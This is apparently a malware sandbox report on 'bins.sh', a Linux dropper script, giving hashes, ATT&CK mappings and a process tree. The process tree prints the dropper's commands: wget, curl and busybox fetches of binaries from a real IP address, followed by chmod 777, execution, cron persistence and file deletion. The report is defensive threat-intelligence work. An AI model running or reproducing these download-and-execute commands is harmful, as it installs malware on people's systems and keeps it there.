d3eecd8c36ad1ce9baed5ddca10403b25037fb7db0baba17634b2343aec6e009

Analysis

max time kernel
150s
max time network
181s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
24-11-2024 07:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

245399d5b11b1319056964a63b42e045
SHA1

1226f9d148106b665043268caa31418cda073f78
SHA256

d3eecd8c36ad1ce9baed5ddca10403b25037fb7db0baba17634b2343aec6e009
SHA512

d7b83fe26010bb9cda4ee7d677bde605276d60d1be25c43cc4a6c4d9b98efd79a73149c4ba1f72ac3ee9c68b7201c310be79a1ca865fde0324e8ae94cdaa7482
SSDEEP

192:mAw0aeSJ7lNm7dFu7I4nhhMWKnHzjWKb7EM1TXcQAd2n2T21G+tfzfz7fr8AwFIN:bO6e2T2q1G+J82q1G+BY

Score

9^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (2051) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmod

pid process

678 chmod
688 chmod

pid	process
678	chmod
688	chmod

Executes dropped EXE 2 IoCs

Processes:

Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

ioc	pid	process
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59	679	Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7	689	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

Renames itself 1 IoCs

Processes:

RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

pid process

690 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.QBaoUQ crontab
Enumerates running processes
Discovers information about currently running processes on the system
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

curlcurl

description ioc process

File opened for reading /proc/cpuinfo curl
File opened for reading /proc/cpuinfo curl

pid	process
690	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.QBaoUQ	crontab

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7curlcurl

description	ioc	process
File opened for reading	/proc/1031/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1043/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/948/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1084/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1091/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/881/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1071/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/811/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1032/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/743/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/762/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/997/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1093/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/24/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/594/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/706/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/871/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/946/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/970/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/8/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/146/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1010/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/745/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/803/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/858/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/898/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/993/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1114/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/732/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/777/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/827/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1079/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/758/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/812/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/829/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/856/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/984/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/755/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/782/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1055/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1090/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1106/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/988/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1009/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/780/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/919/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/939/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1137/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/1/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/813/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/874/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/980/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1144/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/719/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/734/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1006/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/989/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/1052/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/852/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/897/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/878/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
File opened for reading	/proc/900/cmdline	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

Processes:

busyboxwgetcurlbusyboxwgetcurl

description	ioc	process
File opened for modification	/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7	busybox
File opened for modification	/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59	wget
File opened for modification	/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59	curl
File opened for modification	/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59	busybox
File opened for modification	/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7	wget
File opened for modification	/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:645
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:647
- /usr/bin/wget
  wget http://87.120.125.191/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  2⤵
  - Writes file to tmp directory
  PID:649
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:668
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  2⤵
  - Writes file to tmp directory
  PID:676
- /bin/chmod
  chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  2⤵
  - File and Directory Permissions Modification
  PID:678
- /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  ./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  2⤵
  - Executes dropped EXE
  PID:679
- /bin/rm
  rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  2⤵
  PID:681
- /usr/bin/wget
  wget http://87.120.125.191/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  2⤵
  - Writes file to tmp directory
  PID:682
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:683
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  2⤵
  - Writes file to tmp directory
  PID:684
- /bin/chmod
  chmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  2⤵
  - File and Directory Permissions Modification
  PID:688
- /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  ./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:689
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:692
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:693
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:696
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:697
- /bin/rm
  rm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  2⤵
  PID:704
- /usr/bin/wget
  wget http://87.120.125.191/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
  2⤵
  PID:708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

Filesize
107KB

MD5
eb9c3a0de91fcf16ba17cb24608df68c

SHA1
09d95a7d70d5e115d103be51edff7c498d272fac

SHA256
dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

SHA512
9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

Download Submit
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

Filesize
177KB

MD5
786d75a158fe731feca3880f436082c0

SHA1
79ea2734e43d00cdeabed5586b2c1994d02aef3e

SHA256
5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

SHA512
7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Download Submit
/var/spool/cron/crontabs/tmp.QBaoUQ

Filesize
210B

MD5
f9e199368cf7046de1a88c0f6ac50875

SHA1
e8d7fd0544d8180fee253ebbd32ad07772c34119

SHA256
994ac31f9237d8f8ca6af315e461c1161e4522c0b5c26a427a8e58a19f8c8289

SHA512
3584832e930fe9bf253399a9a6eb17b3b849d4231b8d131c3e54c7821ec96c1063d09369f8f947e40cf1960847ec5ccbb950f97cb48a4f0dfe8d85c93d7e993e

Download Submit